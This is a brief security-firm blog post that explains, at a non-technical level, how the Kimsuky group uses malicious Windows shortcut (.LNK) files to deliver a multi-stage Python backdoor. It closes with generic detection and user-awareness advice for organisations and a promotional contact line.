When a Shortcut Isn’t Just a Shortcut: Inside the Kimsuky LNK Malware Campaign

A recent campaign by the Kimsuky threat group shows how simple shortcut (.LNK) files can be used to deliver multi-stage malware attacks. Learn how it works, why it’s effective, and what organisations should do to detect and prevent it.

2 min read

When a Shortcut Isn’t Just a Shortcut: Inside the Kimsuky LNK Malware Campaign

At first glance, a Windows shortcut file (.LNK) looks harmless.

It’s something users interact with every day - opening applications, accessing files, or navigating systems.

But in a recent campaign attributed to the North Korean threat group Kimsuky, these seemingly benign files are being weaponised to deliver a sophisticated, multi-stage cyberattack.

What’s Happening?

Kimsuky is using malicious LNK files as an initial access vector to:

  • Execute hidden commands

  • Trigger multi-stage payload delivery

  • Install a Python-based backdoor on the victim system

The attack is designed to blend in with normal user behaviour, making detection significantly harder.

Why LNK Files?

LNK files are effective because:

  • They are trusted by users

  • They can execute commands in the background

  • They often bypass suspicion compared to traditional malware files

To a user, it looks like:

“Just open this file.”

Behind the scenes, it’s something very different.

How the Attack Works (Simplified)
1. Initial Delivery

The victim receives a malicious LNK file via:

  • Email attachment

  • Download

  • Possibly phishing or targeted campaigns

2. Execution

When opened, the LNK file:

  • Runs embedded commands

  • Initiates the next stage of the attack

No obvious warning signs.

3. Multi-Stage Payload

The attack unfolds across several steps:

  • Additional scripts are downloaded

  • Obfuscation techniques are used

  • Detection is deliberately delayed

4. Python-Based Backdoor Installed

The final payload:

  • Establishes persistent access

  • Enables remote command execution

  • Allows data exfiltration

Why This Matters

This attack highlights a key shift:

Attackers are increasingly using “normal” file types to bypass both users and security controls.

It’s not always about exploiting vulnerabilities.

Sometimes, it’s about exploiting trust and familiarity.

The Real Risk to Organisations

If successful, this type of attack can lead to:

  • Persistent access to systems

  • Data theft

  • Credential compromise

  • Lateral movement within the environment

And because it unfolds in stages, it can evade detection long enough to cause real damage.

What Organisations Should Be Doing
1. Don’t Trust File Types by Default

Even “safe” file types like LNK should be treated with caution.

2. Strengthen Email & Endpoint Controls

Ensure:

  • Attachments are analysed

  • Suspicious behaviour is monitored

  • Scripts and command execution are controlled

3. Improve User Awareness

Users should understand:

  • Not all files are what they appear

  • Unexpected attachments should be treated carefully

4. Monitor Behaviour, Not Just Signatures

Traditional detection may miss multi-stage attacks.

Focus on:

  • Unusual process execution

  • Script activity

  • Outbound connections

Final Thought

Kimsuky’s use of LNK files is a reminder of something simple but important:

Attackers don’t need new tricks, just new ways to use old ones.

And organisations that rely solely on traditional detection methods will increasingly find themselves one step behind.

If you’d like support reviewing your detection capabilities or strengthening your endpoint security posture, get in touch with CNI Security Solutions.

CNI Security Solutions

Tailored Cybersecurity solutions to protect your business today.

info@cnisecurity.co.uk

© CNI Security Solutions Limited. 2026. All rights reserved. Company Number: 16272265 Registered in England and Wales

e-Innovation Centre | University of Wolverhampton |Telford Campus | Priorslee |Telford |TF2 9FT